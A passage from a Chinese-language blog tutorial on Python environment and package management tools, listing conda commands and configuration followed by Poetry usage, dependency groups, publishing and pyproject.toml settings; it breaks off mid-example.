<li>windows安装：<a href="https://docs.conda.io/projects/miniconda/en/latest/">https://docs.conda.io/projects/miniconda/en/latest/</a>  下载适用于系统版本包</li>
<li>mac 安装：使用包管理器安装，如 brew</li>
<li>linux 安装：使用对应发行版包管理器安装，如 pacman</li>
</ul>
<blockquote>
<p>打开命令行执行命令验证是否安装成功：<code>conda --version</code></p>
</blockquote>
<h2 id="使用-2"><a href="#使用-2" class="headerlink" title="使用"></a>使用</h2><ul>
<li><code>conda --version</code>  查看conda信息</li>
<li><code>conda update conda</code>  更新conda</li>
<li><code>conda --help</code>  查看帮助信息</li>
<li><code>conda create -h</code> 指定命令查看帮助信息</li>
<li><code>conda info --verbose</code>   显示conda所有信息</li>
</ul>
<h3 id="环境管理"><a href="#环境管理" class="headerlink" title="环境管理"></a>环境管理</h3><aside>
🔫 关于环境的创建，管理，配置

</aside>

<ul>
<li><code>conda create --name &lt;my-env&gt;</code>  创建环境</li>
<li><code>conda create -n myenv python=3.9</code> 指定python版本创建</li>
<li><code>conda create -n myenv scipy</code>  指定特定软件包创建</li>
<li><code>conda create -n myenv scipy=0.17.3</code>  指定特点版本软件包创建</li>
<li><code>conda create -n myenv python=3.9 scipy=0.17.3 astroid babel</code>  指定python 版本，软件包版本创建</li>
<li><code>conda run -n my-python-env python --version</code>  使用conda环境运行软件包</li>
<li><code>conda install -n myenv pip</code>  在环境中使用pip，应该在conda确实没有包安装的时候才使用pip</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">Pip 应该运行（ --upgrade-strategy only-<span class="keyword">if</span>-needed 默认值）。</span><br><span class="line">不要将 pip 与 --user 参数一起使用，避免所有用户安装。</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>.condarc</code>  这个配置文件存在每次创建环境自动安装的软件包，可以修改添加删除</p>
</blockquote>
<p><code>conda create --no-default-packages -n myenv python</code>  指定<code>--no-default-packages</code> 选项表示不安装 <code>.condarc</code> 文件中的包</p>
<blockquote>
</blockquote>
<ul>
<li><code>conda create --name myclone --clone myenv</code>  复制一个存在的环境</li>
<li><code>conda activate myenv</code>  激活环境，指定环境名称或者路径</li>
<li><code>conda deactivate</code>   停用环境</li>
<li><code>conda env list</code> 环境列表</li>
<li><code>conda list</code> 列出环境中的软件包</li>
<li><code>conda env config vars list</code>  列出环境变量</li>
<li><code>conda env config vars set my_var=value</code> 设置环境变量，设置环境变量后需要重新激活环境</li>
<li><code>conda env config vars unset my_var -n test-env</code> 取消设置环境变量</li>
<li><code>conda env export &gt; environment.yml</code>  导出环境</li>
</ul>
<blockquote>
<p>还原环境</p>
</blockquote>
<ul>
<li><code>conda list --revisions</code> 列出历史环境</li>
<li><code>conda install --revision=REVNUM</code>  指定历史环境还原</li>
<li><code>conda remove --name myenv --all</code>   删除环境</li>
</ul>
<h3 id="软件包管理"><a href="#软件包管理" class="headerlink" title="软件包管理"></a>软件包管理</h3><aside>
🔫 关于使用 conda 管理软件包，搜索，安装，更新，删除等等。

</aside>

<blockquote>
<p><code>conda config --add channels conda-forge</code><br><code>conda config --set channel_priority strict</code></p>
</blockquote>
<p>☺️ 添加conda-forge通道的软件包，里面包含除了默认仓库的大量软件包</p>
<blockquote>
</blockquote>
<ul>
<li><code>conda search scipy</code>   搜索指定软件包</li>
<li><code>conda install --name myenv scipy</code>   安装指定软件包到指定环境</li>
<li><code>conda install scipy</code>  安装到当前环境</li>
<li><code>conda install scipy=0.15.0</code>  指定版本号</li>
<li><code>conda install scipy curl</code>  一次安装多个</li>
</ul>
<blockquote>
<p>如果某个包无法从 conda 或 Anaconda.org 获得，您可以通过 conda-forge 或其他包管理器（如 pip）找到并安装该包。</p>
</blockquote>
<ul>
<li><code>conda install pip</code>  在当前环境安装 pip 集成使用</li>
</ul>
<blockquote>
<p><code>conda config --set pip_interop_enabled True</code> </p>
</blockquote>
<p>提高与 pip 的互操作性#，通过这种互操作性，conda 可以使用 pip-installed 包来满足依赖项，干净地删除 pip-installed 的软件，并在适当的时候用 conda 包替换它们。</p>
<blockquote>
</blockquote>
<ul>
<li><code>conda search package_name --info</code>  列出包依赖</li>
<li><code>conda update biopython</code> 更新指定软件包</li>
<li><code>conda update python</code>  更新环境中的python</li>
<li><code>conda update conda</code>  更新conda本身</li>
<li><code>conda update --update-all</code>    更新环境中所有已安装的软件包。</li>
<li><code>conda update --force-reinstall</code>    确保卸载并重新安装当前操作的任何用户请求的包，即使该包已存在于环境中。</li>
<li><code>conda update numpy --no-pin</code>  跳过版本限制更新包</li>
<li><code>conda config --add create_default_packages PACKAGENAME1 PACKAGENAME2</code>  添加默认软件包，创建新环境，默认软件包将安装在所有环境中。也可以编辑 <code>.condarc</code>   文件</li>
<li><code>conda remove -n myenv scipy</code> 指定包删除</li>
<li><code>conda remove scipy</code>  删除当前环境中的指定包</li>
<li><code>conda remove scipy curl</code>  删除多个包</li>
<li><code>conda clean --all</code>  删除索引缓存、锁定文件、未使用的缓存包、压缩包和日志文件。</li>
<li><code>conda list</code>   列出当前环境安装的所有包</li>
<li><code>conda list -n myenv</code>  列出指定环境名称的所有包</li>
</ul>
<h3 id="python-管理"><a href="#python-管理" class="headerlink" title="python 管理"></a>python 管理</h3><aside>
🔫 conda 中的 python 版本控制，程序管理。Conda 将 Python 与任何其他包相同，因此可以轻松管理和更新多个安装。

</aside>

<ul>
<li><code>conda search python</code>  搜索可用的python包</li>
<li><code>conda update python</code>  更新python</li>
<li><code>conda install python=3.10</code>  安装指定版本</li>
</ul>
<h3 id="environment-yaml-文件"><a href="#environment-yaml-文件" class="headerlink" title="environment.yaml 文件"></a>environment.yaml 文件</h3><aside>
🔫 该文件为conda项目文件，文件内容指定了项目名称，软件包通道，依赖包。

</aside>

<blockquote>
<p>例如</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">name: my-project</span><br><span class="line">channels:</span><br><span class="line">  - defaults</span><br><span class="line">dependencies:</span><br><span class="line">  - python</span><br></pre></td></tr></table></figure>

<ul>
<li>Name ： 环境名称指定</li>
<li>Channels： 软件包渠道，可指定，<code>defaults</code>,<code>conda-forge</code> 或 <code>bioconda</code>等等。</li>
</ul>
<blockquote>
<p><strong>官方Channels由Anaconda公司维护，包括：</strong></p>
<ul>
<li><strong>defaults</strong>：默认的Channel，包含Anaconda公司提供的核心包和工具。</li>
<li><strong>conda-forge</strong>：由社区维护的Channel，包含丰富的包和工具，包括许多最新版本的软件。</li>
<li><strong>bioconda</strong>：专门用于生物信息学相关包的Channel。</li>
<li><strong>conda-envs</strong>：专门用于为特定项目创建虚拟环境的Channel。</li>
</ul>
<p>可自行选择到各大镜像站选择 channels （软件仓库）</p>
</blockquote>
<ul>
<li>Dependencies： 指定依赖包，如python，pip等等。</li>
</ul>
<blockquote>
<p><code>conda env create --file environment.yml</code> 随后指定项目文件创建环境，<br><code>conda env update --file environment.yml</code>  修改文件后，指定项目文件更新</p>
</blockquote>
<hr>
<h3 id="conda配置文件-condarc"><a href="#conda配置文件-condarc" class="headerlink" title="conda配置文件 .condarc"></a>conda配置文件 <strong><code>.condarc</code></strong></h3><aside>
🔫 conda 配置文件 是一个 `.condarc` 可选的运行时配置文件，它允许高级用户配置 conda 的各个方面，例如搜索包的通道、代理设置和环境目录。

<p>运行 <code>conda config</code> 命令自动生成相关文件，可以使用<code>conda config</code> 控制，也可以使用编辑器修改。</p>
</aside>

<ul>
<li><code>conda config --show</code>  显示计算和编译的配置值。未给出参数，则显示所有配置值的信息。</li>
<li><code>conda config --describe</code> 列出所有配置文件信息，可配置选项。</li>
<li><code>conda config --get</code>  获取所有配置信息</li>
<li><code>conda config --get channels</code> 指定配置获取</li>
<li><code>conda config --show-sources</code>   显示所有配置文件源及其内容</li>
<li><code>conda config --add channels http://conda.anaconda.org/mutirri</code>  添加配置</li>
<li><code>conda config --remove channels http://conda.anaconda.org/mutirri</code> 删除配置</li>
<li><code>conda config --remove-key channels</code> 删除某个键值</li>
</ul>
<blockquote>
<p><strong>示例文件</strong></p>
</blockquote>
<p>下面命令可列出所有配置文件信息</p>
<blockquote>
<ul>
<li><code>conda config --describe</code> 列出所有配置文件信息，可配置选项。</li>
</ul>
</blockquote>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"># This is a sample .condarc file.</span><br><span class="line"># It adds the r Anaconda.org channel and enables</span><br><span class="line"><span class="meta"># the show_channel_urls option.</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># channel locations. These override conda defaults, i.e., conda will</span></span><br><span class="line"><span class="meta"># search *only* the channels listed here, in the order given.</span></span><br><span class="line"># Use <span class="string">&quot;defaults&quot;</span> to automatically include all <span class="keyword">default</span> channels.</span><br><span class="line"># Non-url channels will be interpreted as Anaconda.org usernames</span><br><span class="line"># (this can be changed by modifying the channel_alias key; see below).</span><br><span class="line"># The <span class="keyword">default</span> is just <span class="string">&#x27;defaults&#x27;</span>.</span><br><span class="line">channels:</span><br><span class="line">  - r</span><br><span class="line">  - defaults</span><br><span class="line"></span><br><span class="line"># Show channel URLs when displaying what is going to be downloaded</span><br><span class="line"><span class="meta"># and in <span class="string">&#x27;conda list&#x27;</span>. The default is False.</span></span><br><span class="line">show_channel_urls: True</span><br><span class="line"></span><br><span class="line"># For more information about this file see:</span><br><span class="line"><span class="meta"># https:<span class="comment">//conda.io/docs/user-guide/configuration/use-condarc.html</span></span></span><br></pre></td></tr></table></figure>

<h2 id="可选优化"><a href="#可选优化" class="headerlink" title="可选优化"></a>可选优化</h2><h3 id="libmamba-solver"><a href="#libmamba-solver" class="headerlink" title="libmamba solver"></a><strong>libmamba solver</strong></h3><aside>
🔫 libmamba-solver 是 conda 包管理器的新求解器。它比经典求解器更快。要启用它，请先安装 `conda-libmamba-solver` 到 `base` 环境中

</aside>

<ul>
<li><code>conda install -n base conda-libmamba-solver</code></li>
<li>然后添加到 <code>solver: libmamba</code> 到<code>~/.condarc</code></li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">~/.condarc</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line">solver: libmamba</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>总结</strong></p>
</blockquote>
<p>conda 是一个成熟的 python 项目管理的工具，conda 的优势在于其跨平台性、语言无关性和环境管理功能。带有版本控制，环境隔离，依赖包管理，软件包管理等等功能，对数据科学相关工作的用户尤其友好，conda 在数据科学、机器学习、人工智能等领域得到广泛应用。</p>
<blockquote>
</blockquote>
<hr>
<h1 id="Poetry"><a href="#Poetry" class="headerlink" title="Poetry"></a>Poetry</h1><aside>
🔫 Poetry 是 Python 中用于依赖管理和打包的工具。它允许您声明项目所依赖的库，并将为您管理（安装/更新）它们。Poetry 提供了一个锁文件来确保可重复安装，并且可以构建您的项目以进行分发到pypi等仓库。该项目也是本文章提到的管理工具中 star 最多的。其次是文章中提到的pipenv，poetry可以简单理解为pipenv的超集。

<p>项目地址：<a href="https://github.com/python-poetry/poetry">https://github.com/python-poetry/poetry</a></p>
</aside>

<h2 id="安装-2"><a href="#安装-2" class="headerlink" title="安装"></a>安装</h2><aside>
🍂 官方推荐直接将poetry安装到隔离环境中，保证与系统的其余部分隔离。在此介绍一种简单的方法，将poetry安装到隔离环境中使用。这里使用到文章上面部分介绍到的pipx。使用pipx将poetry安装到隔离环境中用于测试。这也是官方的推荐方式之一。

</aside>

<ul>
<li><code>pipx install poetry</code>  安装</li>
<li><code>pipx install poetry==1.2.0</code> 指定版本安装</li>
<li><code>pipx upgrade poetry</code>  更新</li>
<li><code>pipx uninstall poetry</code> 卸载</li>
</ul>
<blockquote>
<p>执行 <code>poetry -V</code>  或者 <code>poetry about</code> 查看版本信息，全局信息，验证是否安装成功。</p>
</blockquote>
<h2 id="管理-poetry-安装本身"><a href="#管理-poetry-安装本身" class="headerlink" title="管理 poetry 安装本身"></a>管理 poetry 安装本身</h2><aside>
🍂 `self add` 命令的工作方式与 `add` 命令完全相同。但是，不同的是，所管理的包是针对 Poetry 的运行时环境的。

</aside>

<ul>
<li><code>poetry search poetry-plug</code>   搜索插件</li>
<li><code>poetry self add poetry-plugin-export</code>  安装插件</li>
<li><code>poetry self add poetry-core@latest</code>  更新到最新版本 <code>poetry-core</code></li>
<li><code>poetry self add artifacts-keyring</code>  添加密钥环提供程序 <code>artifacts-keyring</code></li>
<li><code>poetry self update</code>  在其当前运行时环境中更新 Poetry 版本。</li>
<li><code>poetry self lock</code>  锁定 poetry 本身的依赖到<code>poetry.lock</code> 文件</li>
<li><code>poetry self show</code> 查看 poetry本身</li>
<li><code>poetry self show plugins</code>  显示本身插件</li>
<li><code>poetry self remove poetry-plugin-export</code>  删除插件</li>
<li><code>poetry self install --sync</code>   针对 poetry 本身安装</li>
</ul>
<h2 id="使用-3"><a href="#使用-3" class="headerlink" title="使用"></a>使用</h2><h3 id="全局选项"><a href="#全局选项" class="headerlink" title="全局选项"></a><strong>全局选项</strong></h3><ul>
<li><code>--verbose (-v|vv|vvv)</code> ：增加消息的详细程度：“-v”表示正常输出，“-vv”表示更详细的输出，“-vvv”表示调试。</li>
<li><code>--help (-h)</code> ：显示帮助信息。</li>
<li><code>--quiet (-q)</code> ：不输出任何消息。</li>
<li><code>--ansi</code> ：强制 ANSI 输出。</li>
<li><code>--ansi</code> ：强制 ANSI 输出。</li>
<li><code>--version (-V)</code> ：显示此应用程序版本。</li>
<li><code>--no-interaction (-n)</code> ：不要问任何互动性问题。</li>
<li><code>--no-plugins</code> ：禁用插件。</li>
<li><code>--no-cache</code> ：禁用诗歌源缓存。</li>
<li><code>--directory=DIRECTORY (-C)</code> ：Poetry 命令的工作目录（默认为当前工作目录）。</li>
</ul>
<h3 id="创建新项目"><a href="#创建新项目" class="headerlink" title="创建新项目"></a>创建新项目</h3><ul>
<li><code>poetry new poetry-demo</code>  创建一个项目，指定名称为<code>poetry-demo</code>,可随意，项目文件包含以下内容。</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">poetry-demo</span><br><span class="line">├── pyproject.toml</span><br><span class="line">├── README.md</span><br><span class="line">├── poetry_demo</span><br><span class="line">│   └── __init__.py</span><br><span class="line">└── tests</span><br><span class="line">    └── __init__.py</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>pyproject.toml</code> 文件</p>
</blockquote>
<p><code>pyproject.toml</code> 文件是这里最重要的。这将协调您的项目及其依赖项。目前，它看起来像这样：</p>
<blockquote>
</blockquote>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">[tool.poetry]</span><br><span class="line">name = <span class="string">&quot;poetry-demo&quot;</span></span><br><span class="line">version = <span class="string">&quot;0.1.0&quot;</span></span><br><span class="line">description = <span class="string">&quot;&quot;</span></span><br><span class="line">authors = [<span class="string">&quot;Sébastien Eustace &lt;sebastien@eustace.io&gt;&quot;</span>]</span><br><span class="line">readme = <span class="string">&quot;README.md&quot;</span></span><br><span class="line">packages = [&#123;include = <span class="string">&quot;poetry_demo&quot;</span>&#125;]</span><br><span class="line"></span><br><span class="line">[tool.poetry.dependencies]</span><br><span class="line">python = <span class="string">&quot;^3.7&quot;</span></span><br><span class="line"></span><br><span class="line">[build-system]</span><br><span class="line">requires = [<span class="string">&quot;poetry-core&quot;</span>]</span><br><span class="line">build-backend = <span class="string">&quot;poetry.core.masonry.api&quot;</span></span><br></pre></td></tr></table></figure>

<h3 id="初始化已存在项目"><a href="#初始化已存在项目" class="headerlink" title="初始化已存在项目"></a>初始化已存在项目</h3><ul>
<li>Poetry 可用于“初始化”预填充的目录，而不是创建新项目。进入项目目录</li>
<li><code>poetry init</code>   执行后交互式创建</li>
</ul>
<h3 id="安装依赖项"><a href="#安装依赖项" class="headerlink" title="安装依赖项"></a>安装依赖项</h3><ul>
<li><code>poetry install</code>    该命令通过读取<code>pyproject.toml</code> 文件中的依赖包列表进行依赖安装。会有以下两种情况。</li>
<li>第一种情况：项目中没有 <code>poetry.lock</code> 文件，会自动在项目中生成**<code>poetry.lock</code>** 文件，Poetry 只需解析 <code>pyproject.toml</code> 文件中列出的所有依赖项并下载其文件的最新版本。当 Poetry 完成安装后，它会将下载的所有包及其确切版本写入 <code>poetry.lock</code> 文件，并将项目锁定到这些特定版本。应将 <code>poetry.lock</code> 文件提交到项目存储库，以便所有处理该项目的人员都锁定到相同版本的依赖项。</li>
<li>第二种情况：已经存在**<code>poetry.lock</code>**文件以及 <code>pyproject.toml</code>，运行 <code>install</code>会解析安装该文件列出的所有依赖包，</li>
<li>作为应用程序开发人员应该将该两个文件提交到项目中确保能构建同样的依赖环境。作为库开发人员应该省略 <code>poetry.lock</code>文件</li>
</ul>
<h3 id="添加安装依赖"><a href="#添加安装依赖" class="headerlink" title="添加安装依赖"></a>添加安装依赖</h3><ul>
<li><code>$ poetry add pendulum</code>  该命令会将指定依赖软件包添加到<code>pyproject.toml</code>文件和<code>poetry.lock</code>文件中，并安装该软件包。</li>
</ul>
<h3 id="依赖包更新"><a href="#依赖包更新" class="headerlink" title="依赖包更新"></a>依赖包更新</h3><ul>
<li><code>poetry.lock</code> 文件阻止您自动获取最新版本的依赖包。 要更新到最新版本，请使用 <code>update</code>命令。 这将根据<code>pyproject.toml文件</code>获取最新的匹配版本，并使用新版本更新锁定文件（<code>poetry.lock</code>）。 （这相当于删除 <code>poetry.lock</code>文件并再次运行 <code>install</code>。）</li>
<li><code>poetry update</code></li>
<li><code>poetry update requests toml</code> 指定包更新</li>
<li>该更新命令并不会修改<code>pyproject.toml</code> 文件，依然按照文件内容更新，可以使用 <code>add</code> 更新</li>
</ul>
<h3 id="依赖包删除"><a href="#依赖包删除" class="headerlink" title="依赖包删除"></a>依赖包删除</h3><ul>
<li><code>poetry remove pendulum</code>  指定包删除</li>
<li><code>poetry remove mkdocs --group docs</code> 指定依赖组删除指定包</li>
</ul>
<h3 id="虚拟环境-1"><a href="#虚拟环境-1" class="headerlink" title="虚拟环境"></a>虚拟环境</h3><ul>
<li>默认情况下，新建项目或者初始化项目都会建立虚拟隔离环境</li>
<li><strong>激活虚拟环境的最简单方法是使用 <code>poetry shell</code> 创建嵌套 shell。测试环境时需先激活</strong></li>
<li><code>poetry run python -V</code>  该 run 命令在项目的 virtualenv 中执行给定的命令。</li>
<li><code>poetry cache list</code> 列出缓存</li>
<li><code>poetry cache clear pypi --all</code> 删除缓存</li>
<li><code>poetry env use /full/path/to/python</code>   使用环境，</li>
<li><code>poetry env info</code>  查看环境信息</li>
<li><code>poetry env info --path</code>  指定目标查看环境信息</li>
<li><code>poetry env list</code>  列出环境</li>
<li><code>poetry env list --full-path</code>     列出完整路径环境</li>
<li><code>poetry env remove /full/path/to/python</code>  删除环境</li>
<li><code>poetry env remove --all</code>  删除全部环境</li>
</ul>
<h3 id="执行脚本"><a href="#执行脚本" class="headerlink" title="执行脚本"></a>执行脚本</h3><ul>
<li>要运行脚本，只需使用 <code>poetry run python your_script.py</code> .同样，如果您有命令行工具，例如 <code>pytest</code> or <code>black</code> ，则可以使用 <code>poetry run pytest</code> .</li>
</ul>
<h3 id="依赖包搜索"><a href="#依赖包搜索" class="headerlink" title="依赖包搜索"></a>依赖包搜索</h3><ul>
<li><code>poetry search requests pendulum</code>  搜索指定包</li>
</ul>
<h3 id="软件仓库"><a href="#软件仓库" class="headerlink" title="软件仓库"></a>软件仓库</h3><ul>
<li><code>poetry source add pypi-test https://test.pypi.org/simple/</code>  添加<code>pypi-test</code> 源</li>
<li><code>poetry source show</code> 显示软件源信息</li>
<li><code>poetry source show pypi-test</code> 指定名称显示</li>
<li><code>poetry source remove pypi-test</code>  删除源</li>
</ul>
<h2 id="依赖管理"><a href="#依赖管理" class="headerlink" title="依赖管理"></a>依赖管理</h2><h3 id="依赖组"><a href="#依赖组" class="headerlink" title="依赖组"></a>依赖组</h3><ul>
<li>poetry 提供了可将依赖包分组的功能。用途：例如你的项目中会用到某些包来生成文档等等功能，但是该依赖包并不是项目运行所需要的，所以可以将其分组到其它依赖组中。</li>
<li>文件示例：</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">[tool.poetry.group.test]  # This part can be left out</span><br><span class="line"></span><br><span class="line">[tool.poetry.group.test.dependencies]</span><br><span class="line">pytest = <span class="string">&quot;^6.0.0&quot;</span></span><br><span class="line">pytest-mock = <span class="string">&quot;*&quot;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>定义dev依赖</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">[tool.poetry.group.dev.dependencies]</span><br><span class="line">pytest = <span class="string">&quot;^6.0.0&quot;</span></span><br><span class="line">pytest-mock = <span class="string">&quot;*&quot;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>可选组，依赖项组可以声明为可选。有一组仅在特定环境或特定用途中需要的依赖项时，这很有意义。</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">[tool.poetry.group.docs]</span><br><span class="line">optional = <span class="literal">true</span></span><br><span class="line"></span><br><span class="line">[tool.poetry.group.docs.dependencies]</span><br><span class="line">mkdocs = <span class="string">&quot;*&quot;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><code>poetry install --with docs</code>  指定组安装依赖</li>
<li><code>poetry add pytest --group test</code>  指定组添加依赖，如果该组尚不存在，则将自动创建该组。</li>
<li><code>poetry install</code>  默认安装所有组依赖</li>
<li><code>poetry install --without test,docs</code> 指定排除组依赖安装</li>
<li><code>poetry install --only docs</code>  仅安装指定依赖</li>
<li><code>poetry install --only main</code>  仅安装项目运行依赖</li>
<li><code>poetry remove mkdocs --group docs</code>  从组中删除依赖</li>
<li><code>poetry install --sync</code>  同步依赖项，依赖项同步可确保 <code>poetry.lock</code> 文件中锁定的依赖项是环境中唯一存在的依赖项，从而删除任何不必要的内容。</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">poetry install --without dev --sync</span><br><span class="line">poetry install --with docs --sync</span><br><span class="line">poetry install --only dev</span><br><span class="line"></span><br><span class="line">可组合使用</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>add</code> 命令将所需的软件包添加到您的 <code>pyproject.toml</code> 并安装它们。如果不指定版本约束，poetry 会根据可用的包版本选择合适的版本。</p>
</blockquote>
<ul>
<li><code>poetry add requests pendulum</code>  将包添加到<code>pyproject.toml</code> 并安装</li>
<li><code>poetry add &quot;pendulum&gt;=2.0.5&quot;</code>  指定版本</li>
<li><code>poetry add git+https://github.com/sdispater/pendulum.git</code>  指定git</li>
<li><code>poetry add ./my-package/</code></li>
<li><code>poetry add ../my-package/dist/my_package-0.1.0.whl</code>  指定本地目录或文件</li>
</ul>
<blockquote>
<p><strong>信息查询</strong></p>
</blockquote>
<ul>
<li><code>poetry show</code> 列出所有可用的包，可以使用以下 <code>show</code> 命令。</li>
<li><code>poetry show pendulum</code>  指定包列出详细信息</li>
<li><code>poetry config --list</code>  列出配置信息</li>
<li><code>poetry check</code>  该 <code>check</code> 命令验证 <code>pyproject.toml</code> 文件的内容及其与 <code>poetry.lock</code> 文件的一致性。</li>
<li><code>poetry version</code>  显示poetry 版本号</li>
<li><code>poetry about</code>  <code>about</code> 命令显示有关 Poetry 的全局信息，包括当前版本和 <code>poetry-core</code> 的版本。</li>
<li><code>poetry help</code>  显示全局帮助信息</li>
<li><code>poetry show --help</code>  显示指定命令帮助信息</li>
<li><code>poetry list</code> 列出所有可用的poetry命令</li>
</ul>
<blockquote>
<p><strong>环境导出</strong></p>
</blockquote>
<ul>
<li><code>poetry export -f requirements.txt --output requirements.txt</code>  此命令将锁定文件导出为其他格式。</li>
<li><code>--format (-f)</code> ：要导出到的格式（默认值： <code>requirements.txt</code> ）。目前，仅 <code>constraints.txt</code> 和 <code>requirements.txt</code> 受支持。</li>
</ul>
<h2 id="项目发布"><a href="#项目发布" class="headerlink" title="项目发布"></a>项目发布</h2><aside>
🍂 poetry 可以将项目打包发送到pypi库，或者私有仓库。

</aside>

<ul>
<li>Poetry 要求所有项目都符合 PEP 440 标准。</li>
<li>可选发布<code>poetry.lock</code>文件，不发布可选将起添加到<code>.gitignore</code>文件（git）</li>
</ul>
<blockquote>
<p>发布到pypi</p>
</blockquote>
<ul>
<li><code>poetry build</code>  将项目打包，此命令将以两种不同的格式打包库： <code>sdist</code> 是源格式， <code>wheel</code> 是 <code>compiled</code> 包格式。</li>
<li>sdist 格式是源代码格式，包含了 Python 源代码、许可证文件、README 文件等。用户需要自行编译 sdist 格式包才能安装使用。需要发布到 PyPI 的 Python 包必须使用 sdist 格式</li>
<li>wheel 格式是二进制格式，包含了编译好的 Python 代码、依赖库等。用户可以直接安装 wheel 格式包，无需自行编译。</li>
<li><code>poetry publish</code>  将打包好的包进行发布，需要提前注册用户并且已正确配置凭据。如果要同时生成和发布包，只需传递该 <code>--build</code> 选项即可。</li>
<li>api token 注册pypi后账户查看。</li>
<li>请注意，建议在将包上传到 PyPI 时使用 API 令牌。创建新令牌后，您可以告诉 Poetry 使用它：<code>poetry config pypi-token.pypi &lt;my-token&gt;</code></li>
<li>使用密码：<code>poetry config http-basic.pypi &lt;username&gt; &lt;password&gt;</code></li>
</ul>
<h3 id="存储库"><a href="#存储库" class="headerlink" title="存储库"></a>存储库</h3><aside>
🍂 Poetry 支持使用 PyPI 和私有存储库来发现包以及发布项目。默认使用 pypi 。

</aside>

<ul>
<li><code>poetry source add  foo https://pypi.example.org/simple/</code>    添加存储库</li>
<li><code>poetry add --source foo private-package</code>  指定存储库安装包</li>
</ul>
<h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2><aside>
🍂 关于 poetry 的配置，可以通过命令配置，也可以使用配置文件编辑配置

</aside>

<h3 id="命令配置"><a href="#命令配置" class="headerlink" title="命令配置"></a>命令配置</h3><ul>
<li><code>poetry config --list</code>  列出当前配置信息</li>
<li><code>poetry config virtualenvs.path</code>  指定值查看配置信息</li>
<li><code>poetry config virtualenvs.path /path/to/cache/directory/virtualenvs</code>  添加或更新配置</li>
<li><code>poetry config virtualenvs.path --unset</code>  删除特定配置</li>
</ul>
<blockquote>
<p>环境变量配置方法</p>
</blockquote>
<p>环境变量必须以 <code>POETRY_</code> 设置的大写名称为前缀，并由大写名称组成，点和短划线替换为下划线，下面是一个示例：</p>
<p>但是我这边测试不需要加上 <code>POETRY</code> 前缀，加上识别不了环境变量，可自己环境测试。</p>
<blockquote>
</blockquote>
<ul>
<li><code>export POETRY_VIRTUALENVS_PATH=/path/to/virtualenvs/directory</code></li>
<li><code>export POETRY_HTTP_BASIC_MY_REPOSITORY_PASSWORD=secret</code></li>
</ul>
<h3 id="项目配置文件-pyproject-toml"><a href="#项目配置文件-pyproject-toml" class="headerlink" title="项目配置文件 pyproject.toml"></a>项目配置文件 <code>pyproject.toml</code></h3><aside>
🍂 `pyproject.toml` 文件是每一各项目的配置文件，用于配置当前项目的配置信息，版本，依赖控制等等。

<p>创建项目或者，初始化项目会自动生成。</p>
</aside>

<blockquote>
<p>配置文件示例：</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">name = <span class="string">&quot;my-package&quot;</span>   <span class="comment">// 包名</span></span><br><span class="line">version = <span class="string">&quot;0.1.0&quot;</span>  <span class="comment">// 版本</span></span><br><span class="line">description = <span class="string">&quot;A short description of the package.&quot;</span> <span class="comment">// 描述</span></span><br><span class="line">license = <span class="string">&quot;MIT&quot;</span> <span class="comment">// 许可证</span></span><br><span class="line">authors = [</span><br><span class="line">    <span class="string">&quot;Sébastien Eustace &lt;sebastien@eustace.io&gt;&quot;</span>,</span><br><span class="line">] <span class="comment">// 作者</span></span><br><span class="line">maintainers = [</span><br><span class="line">    <span class="string">&quot;John Smith &lt;johnsmith@example.org&gt;&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Jane Smith &lt;janesmith@example.org&gt;&quot;</span>,</span><br><span class="line">] <span class="comment">//维护者</span></span><br><span class="line">[tool.poetry]</span><br><span class="line"># ...</span><br><span class="line">readme = [<span class="string">&quot;docs/README1.md&quot;</span>, <span class="string">&quot;docs/README2.md&quot;</span>] <span class="comment">// 自述文件</span></span><br><span class="line">homepage = <span class="string">&quot;https://python-poetry.org/&quot;</span>  <span class="comment">// 项目主页网站</span></span><br><span class="line">repository = <span class="string">&quot;https://github.com/python-poetry/poetry&quot;</span>  <span class="comment">//存储库</span></span><br><span class="line">documentation = <span class="string">&quot;https://python-poetry.org/docs/&quot;</span> <span class="comment">// 文档</span></span><br><span class="line">keywords = [<span class="string">&quot;packaging&quot;</span>, <span class="string">&quot;poetry&quot;</span>]  <span class="comment">// 关键字</span></span><br><span class="line">[tool.poetry]</span><br><span class="line"># ...</span><br><span class="line">classifiers = [</span><br><span class="line">    <span class="string">&quot;Topic :: Software Development :: Build Tools&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Topic :: Software Development :: Libraries :: Python Modules&quot;</span></span><br><span class="line">]  <span class="comment">// 分类</span></span><br><span class="line">[tool.poetry]</span><br><span class="line"># ...</span><br><span class="line">packages = [</span><br><span class="line">    &#123; include = <span class="string">&quot;my_package&quot;</span> &#125;,</span><br><span class="line">    &#123; include = <span class="string">&quot;extra_package/**/*.py&quot;</span> &#125;,</span><br><span class="line">]  <span class="comment">//要包含在最终发行版中的包和模块的列表。</span></span><br><span class="line">[tool.poetry.dependencies]</span><br><span class="line">requests = <span class="string">&quot;^2.13.0&quot;</span>  <span class="comment">// pypi 中的依赖指定</span></span><br><span class="line"></span><br><span class="line">[[tool.poetry.source]]</span><br><span class="line">name = <span class="string">&quot;private&quot;</span></span><br><span class="line">url = <span class="string">&quot;http://example.com/simple&quot;</span> <span class="comment">// 其他存储库依赖指定</span></span><br><span class="line"></span><br><span class="line">[tool.poetry.dependencies]</span><br><span class="line">requests = &#123; version = <span 